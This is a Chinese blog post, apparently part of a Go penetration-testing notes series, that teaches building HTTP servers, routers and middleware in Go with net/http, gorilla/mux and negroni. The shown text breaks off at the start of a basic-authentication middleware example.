<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>Go渗透测试笔记(四) | h0ld1rs的博客</title><meta name="keywords" content="Golang"><meta name="author" content="h0ld1rs"><meta name="copyright" content="h0ld1rs"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="HTTP服务器，路由，中间件">
<meta property="og:type" content="article">
<meta property="og:title" content="Go渗透测试笔记(四)">
<meta property="og:url" content="https://h0ld1rs.github.io/posts/13916.html">
<meta property="og:site_name" content="h0ld1rs的博客">
<meta property="og:description" content="HTTP服务器，路由，中间件">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://h0ld1rs.github.io/img/image/5.png">
<meta property="article:published_time" content="2022-03-02T03:46:28.000Z">
<meta property="article:modified_time" content="2022-03-23T14:25:00.699Z">
<meta property="article:author" content="h0ld1rs">
<meta property="article:tag" content="Golang">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://h0ld1rs.github.io/img/image/5.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://h0ld1rs.github.io/posts/13916"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'Go渗透测试笔记(四)',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-03-23 22:25:00'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.0.0"><link rel="alternate" href="/atom.xml" title="h0ld1rs的博客" type="application/atom+xml">
</head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/1.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">21</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">8</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">7</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 目录</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('/img/image/5.png')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">h0ld1rs的博客</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 主页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 目录</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">Go渗透测试笔记(四)</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-03-02T03:46:28.000Z" title="发表于 2022-03-02 11:46:28">2022-03-02</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-03-23T14:25:00.699Z" title="更新于 2022-03-23 22:25:00">2022-03-23</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/Go/">Go</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="Go渗透测试笔记(四)"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span><span class="post-meta-separator">|</span><span class="post-meta-commentcount"><i class="far fa-comments fa-fw post-meta-icon"></i><span class="post-meta-label">评论数:</span><a href="/posts/13916.html#post-comment"><span id="twikoo-count"></span></a></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h1 id="Go渗透测试笔记-四-–HTTP服务器，路由，中间件"><a href="#Go渗透测试笔记-四-–HTTP服务器，路由，中间件" class="headerlink" title="Go渗透测试笔记(四)–HTTP服务器，路由，中间件"></a>Go渗透测试笔记(四)–HTTP服务器，路由，中间件</h1><h2 id="0x00-HTTP服务器基础"><a href="#0x00-HTTP服务器基础" class="headerlink" title="0x00 HTTP服务器基础"></a>0x00 HTTP服务器基础</h2><h3 id="1-构建一个简单的服务器"><a href="#1-构建一个简单的服务器" class="headerlink" title="1. 构建一个简单的服务器"></a>1. 构建一个简单的服务器</h3><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;fmt&quot;</span></span><br><span class="line">	<span class="string">&quot;net/http&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">hello</span><span class="params">(w http.ResponseWriter,r * http.Request)</span></span>&#123;</span><br><span class="line">	fmt.Fprintf(w,<span class="string">&quot;Hello %s \n&quot;</span>,r.URL.Query().Get(<span class="string">&quot;name&quot;</span>))</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	http.HandleFunc(<span class="string">&quot;/hello&quot;</span>,hello)</span><br><span class="line">	http.ListenAndServe(<span class="string">&quot;:8000&quot;</span>,<span class="literal">nil</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>主要是使用<code>HandleFunc</code>创建一个<code>Handler</code>，然后启动监听器访问即可</p>
<p>同时在写处理请求的时候，需要两个参数，一个是<code>http.ResponseWriter</code>，用于对请求的写入，另一个是<code>Request</code>类型的指针，它运训我们从传入的请求信息中去读取信息。</p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220302120351.png"></p>
<blockquote>
<p>http.HandFunc()是怎么运行的？</p>
<p>由Go文档可知，处理程序被放置在<code>DefaultServerMux</code>上面，<code>ServerMux</code>是多路复用器(server multiplexer)的简写，它可以处理多模式函数的多个HTTP请求，它使用<code>gorountine</code>执行此操作。</p>
</blockquote>
<h3 id="2-构造一个简单路由器"><a href="#2-构造一个简单路由器" class="headerlink" title="2. 构造一个简单路由器"></a>2. 构造一个简单路由器</h3><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;fmt&quot;</span></span><br><span class="line">	<span class="string">&quot;net/http&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">type</span> router <span class="keyword">struct</span> &#123;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(r *router)</span></span>ServeHTTP(w http.ResponseWriter,req *http.Request)  &#123;</span><br><span class="line">	<span class="keyword">switch</span> req.URL.Path &#123;</span><br><span class="line">	<span class="keyword">case</span> <span class="string">&quot;/a&quot;</span>:</span><br><span class="line">		fmt.Fprintf(w,<span class="string">&quot;Executing /a&quot;</span>)</span><br><span class="line">	<span class="keyword">case</span> <span class="string">&quot;/b&quot;</span>:</span><br><span class="line">		fmt.Fprintf(w,<span class="string">&quot;Executing /b&quot;</span>)</span><br><span class="line">	<span class="keyword">case</span> <span class="string">&quot;/c&quot;</span>:</span><br><span class="line">		fmt.Fprintf(w,<span class="string">&quot;Executing /c&quot;</span>)</span><br><span class="line">	<span class="keyword">default</span>:</span><br><span class="line">		http.Error(w,<span class="string">&quot;404 not found&quot;</span>,<span class="number">404</span>)</span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span>  &#123;</span><br><span class="line">	<span class="keyword">var</span> r router</span><br><span class="line">	http.ListenAndServe(<span class="string">&quot;:8000&quot;</span>,&amp;r)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里重写了<code>ServeHTTP</code></p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220302142529.png"></p>
<h3 id="3-构造一个简单的中间件"><a href="#3-构造一个简单的中间件" class="headerlink" title="3. 构造一个简单的中间件"></a>3. 构造一个简单的中间件</h3><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;fmt&quot;</span></span><br><span class="line">	<span class="string">&quot;log&quot;</span></span><br><span class="line">	<span class="string">&quot;net/http&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">type</span> logger <span class="keyword">struct</span> &#123;</span><br><span class="line">	Inner http.Handler</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(l *logger)</span></span>ServeHTTP(w http.ResponseWriter,r * http.Request) &#123;</span><br><span class="line">	log.Println(<span class="string">&quot;start&quot;</span>)</span><br><span class="line">	l.Inner.ServeHTTP(w,r)</span><br><span class="line">	log.Println(<span class="string">&quot;Finish&quot;</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">hello</span><span class="params">(w http.ResponseWriter,r *http.Request)</span></span> &#123;</span><br><span class="line">	fmt.Println(w,<span class="string">&quot;Hello\n&quot;</span>)</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	f := http.HandlerFunc(hello)</span><br><span class="line">	l := logger&#123;Inner:f&#125;</span><br><span class="line">	http.ListenAndServe(<span class="string">&quot;:8000&quot;</span>,&amp;l)</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>我们创建了一个外部程序，该程序在每次请求时都会在服务器上记录一些信息，并调用函数<code>hello()</code>，我们将此日志逻辑包装在函数中。</p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220302150042.png"></p>
<h3 id="4-使用-gorilla-x2F-mux-包进行路由"><a href="#4-使用-gorilla-x2F-mux-包进行路由" class="headerlink" title="4.使用 gorilla&#x2F;mux 包进行路由"></a>4.使用 gorilla&#x2F;mux 包进行路由</h3><p><code>gorilla/mux</code>是个成熟的第三方路由包，可以基于简单，复杂的模式进行路由。他包含正则表达式，参数匹配，动词匹配及子路由等其他功能</p>
<p>同时，我们需要先下载<code>gorilla/mux</code>包</p>
<blockquote>
<p>go get github.com&#x2F;gorilla&#x2F;mux</p>
</blockquote>
<p>现在，开始使用这个路由包，使用<code>mux.NewRouter()</code>创建路由器</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">r := mux.NewRounter()</span><br></pre></td></tr></table></figure>

<p>返回的类型接口实现了<code>http.Handler</code>，但同时也具有许多其他关联的方法。其中，最长用的方法是：<code>HandleFunc()</code>，如果想定义新的路由来对<code>/foo</code>模式的<code>Get</code>请求，则可以使用如下</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">r.HandleFunc(<span class="string">&quot;/foo&quot;</span>, <span class="function"><span class="keyword">func</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">		fmt.Fprintf(w,<span class="string">&quot;hi foo&quot;</span>)</span><br><span class="line">	&#125;).Methods(<span class="string">&quot;Get&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>由于调用了<code>Method()</code>，因此，只有<code>Get</code>请求才能匹配此路由。所有其他方法将返回404请求。可以在此之上链接其他限定符，例如，与特定主机头值匹配的<code>Host()</code>。以下内容仅返回与主机头设置为<code>www.foo1.com</code>的请求匹配</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">.HandleFunc(<span class="string">&quot;/foo1&quot;</span>, <span class="function"><span class="keyword">func</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">		fmt.Fprintf(w,<span class="string">&quot;hi foo1&quot;</span>)</span><br><span class="line">	&#125;).Methods(<span class="string">&quot;Get&quot;</span>).Host(<span class="string">&quot;www.foo1.com&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>有时，在请求路径中匹配并传递参数会很有帮助。<code>gorilla/mux</code>很适合。</p>
<p>打印出请求路径在<code>user</code>之后的所有内容</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">r.HandleFunc(<span class="string">&quot;/user/&#123;user&#125;&quot;</span>, <span class="function"><span class="keyword">func</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">		user := mux.Vars(r)[<span class="string">&quot;user&quot;</span>]</span><br><span class="line">		fmt.Fprintf(w,<span class="string">&quot;hi %s\n&quot;</span>,user)</span><br><span class="line">	&#125;).Methods(<span class="string">&quot;Get&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>在定义请求路径时，可以使用花括号定义请求参数。可以将此视为已经命名的占位符。然后再函数中调用<code>mux.Var()</code>，将请求对象传递给它。此时会返回<code>map [string]string</code></p>
<p>此外还可以使用正则表达式来限定传递的模式。例如，指定user的参数必须为小写字母</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">r.HandleFunc(<span class="string">&quot;/user/&#123;user:[a-z]+&#125;&quot;</span>, <span class="function"><span class="keyword">func</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">		user := mux.Vars(r)[<span class="string">&quot;user&quot;</span>]</span><br><span class="line">		fmt.Fprintf(w,<span class="string">&quot;hi %s\n&quot;</span>,user)</span><br><span class="line">	&#125;).Methods(<span class="string">&quot;Get&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>完整的代码如下</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;fmt&quot;</span></span><br><span class="line">	<span class="string">&quot;github.com/gorilla/mux&quot;</span></span><br><span class="line">	<span class="string">&quot;net/http&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	r := mux.NewRouter()</span><br><span class="line"></span><br><span class="line">	r.HandleFunc(<span class="string">&quot;/foo&quot;</span>, <span class="function"><span class="keyword">func</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">		fmt.Fprintf(w,<span class="string">&quot;hi foo&quot;</span>)</span><br><span class="line">	&#125;).Methods(<span class="string">&quot;Get&quot;</span>)</span><br><span class="line"></span><br><span class="line">	r.HandleFunc(<span class="string">&quot;/foo1&quot;</span>, <span class="function"><span class="keyword">func</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">		fmt.Fprintf(w,<span class="string">&quot;hi foo1&quot;</span>)</span><br><span class="line">	&#125;).Methods(<span class="string">&quot;Get&quot;</span>).Host(<span class="string">&quot;www.foo1.com&quot;</span>)</span><br><span class="line"></span><br><span class="line">	r.HandleFunc(<span class="string">&quot;/user/&#123;user:[a-z]+&#125;&quot;</span>, <span class="function"><span class="keyword">func</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">		user := mux.Vars(r)[<span class="string">&quot;user&quot;</span>]</span><br><span class="line">		fmt.Fprintf(w,<span class="string">&quot;hi %s\n&quot;</span>,user)</span><br><span class="line">	&#125;).Methods(<span class="string">&quot;Get&quot;</span>)</span><br><span class="line"></span><br><span class="line">	http.ListenAndServe(<span class="string">&quot;:8000&quot;</span>,r)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="5-使用negroni包构建中间件"><a href="#5-使用negroni包构建中间件" class="headerlink" title="5. 使用negroni包构建中间件"></a>5. 使用<code>negroni</code>包构建中间件</h3><p>我们之前的中间件，记录了有关请求处理的开始和结束时间，并且返回了响应。再很多情况下，中间件其实不必对每个传入的请求都进行操作。使用中间件的原因由很多，其中包括记录请求，对用户身份验证和授权以及映射资源。</p>
<p>例如可以编写用于执行基本身份认证的中间件，它可以为每个请求解析一个授权标头，验证所提供的用户名和密码。如果凭证是无效的，则返回401响应。我们还可以将多个中间件函数链接再一起，从而能执行完一个中间件后执行下一个中间件。</p>
<p>此前创建的日志记录中间件仅包装类了一个函数，实际上，并没有什么作用。因为一般都是链式调用</p>
<p>接下来使用成熟的包<code>negroni</code></p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">go</span> get github.com/urfave/negroni</span><br></pre></td></tr></table></figure>

<p>然后进行一个简单的使用</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;github.com/gorilla/mux&quot;</span></span><br><span class="line">	<span class="string">&quot;github.com/urfave/negroni&quot;</span></span><br><span class="line">	<span class="string">&quot;net/http&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	r := mux.NewRouter()</span><br><span class="line">	n := negroni.Classic()</span><br><span class="line">	n.UseHandler(r)</span><br><span class="line">	http.ListenAndServe(<span class="string">&quot;:8000&quot;</span>,n)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中  <code>negroni.Classic()</code>创建了一个指向<code>Negroni</code>实例的新指针。</p>
<blockquote>
<p>要创建新指针由很多种方法</p>
<p>negroni.Classic()或者 negroni.New()</p>
<p>但是 negronic.Classic()使用默认的中间件，包括请求记录器，再默认的情况下拦截和恢复的中间件，以及服务于同一个目录的公共文件夹的中间件，函数<code>nehgroni.New()</code>不会创建任何默认的中间件</p>
<p>同时，<code>negroni.Use(NewRecovery())</code>可以用来使用恢复包</p>
</blockquote>
<p>接下来通过<code>n.UseHandler(r)</code>将路由器添加到中间件堆栈。在继续设计的时候，要考虑执行顺序。</p>
<p>例如：我们希望身份验证检查中间件需要在身份验证的处理函数之前运行。在路由器之前添加的任何中间件都将在处理函数运行前执行。路由之后添加的任何中间件都将在处理函数之后执行。</p>
<p><img src="https://cdn.jsdelivr.net/gh/h0ld1rs/image/image/20220302222010.png"></p>
<blockquote>
<p>发出 web请求后， negorni 将中间件信息打印到标准输出，</p>
</blockquote>
<p>默认的插件固然好用，但我们需要进行一个包装</p>
<p>首先输出一条消息，并将执行传递给下一个中间件</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">type</span> trival <span class="keyword">struct</span> &#123;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="params">(t * trival)</span></span>ServeHTTP(w http.ResponseWriter,r * http.Request,next http.HandlerFunc) &#123;</span><br><span class="line">	fmt.Println(<span class="string">&quot;Executing trival middleware&quot;</span>)</span><br><span class="line">	next(w,r)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们重写了<code>ServeHTTP</code>的方法，加了一个 http.HandlerFunc 的参数，用来指向下一个中间件函数。</p>
<p>调用了 next 传递参数，实现在中间件链上的转移。</p>
<blockquote>
<p>个人感觉，这种方式有些类似于链表</p>
</blockquote>
<p>不过，需要告诉<code>negroni</code>包要将上述实现作为中间件链的部分，为此，可以调用<code>nergoni</code>的<code>Use</code>方法，并将接口<code>nergroni.Handler</code>实现的实例类传递给该方法。</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">n.Use(&amp;trival&#123;&#125;)</span><br></pre></td></tr></table></figure>

<p>虽然使用该方法编写中间件非常方便，但是，该方法也有一个弊端。无论编写什么方法都需要使用<code>negroni</code>包。</p>
<p>例如，我们正在写一个将安全标头写入响应的中间件包，希望它可以实现<code>Http.Handler</code>，这样就可以在其他应用程序中使用该接口，因为绝大多数程序栈似乎都不太欢迎接口<code>negroni.Handler</code></p>
<p>初次之外，还有两种方法让<code>negroni</code>包使用我们的中间件。其中一种就是<code>UseHadnler(handler http.Handler)</code></p>
<p>第二种方法是，调用<code>UseHandlerFunc(HandlerFunc func(w http.ResponseWriter,r * http.Request))</code></p>
<p>后者不太常用，因为它不允许放弃执行链中的下一个中间件。例如，一个中间件是用于执行身份验证的，如有无效凭证或者会话信息，则会返回401响应，并且停止运行。那么，第二种就完全不适合。</p>
<h3 id="6-使用negroni包添加身份认证"><a href="#6-使用negroni包添加身份认证" class="headerlink" title="6. 使用negroni包添加身份认证"></a>6. 使用negroni包添加身份认证</h3><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">&quot;context&quot;</span></span><br><span class="line">	<span class="string">&quot;fmt&quot;</span></span><br><span class="line">	<span class="string">&quot;github.com/gorilla/mux&quot;</span></span><br><span class="line">	<span class="string">&quot;github.com/urfave/negroni&quot;</span></span><br><span class="line">	<span class="string">&quot;net/http&quot;</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="keyword">type</span> badAuth <span class="keyword">struct</span> &#123;</span><br><span class="line">	Username <span class="type">string</span></span><br><span class="line">	Password <span 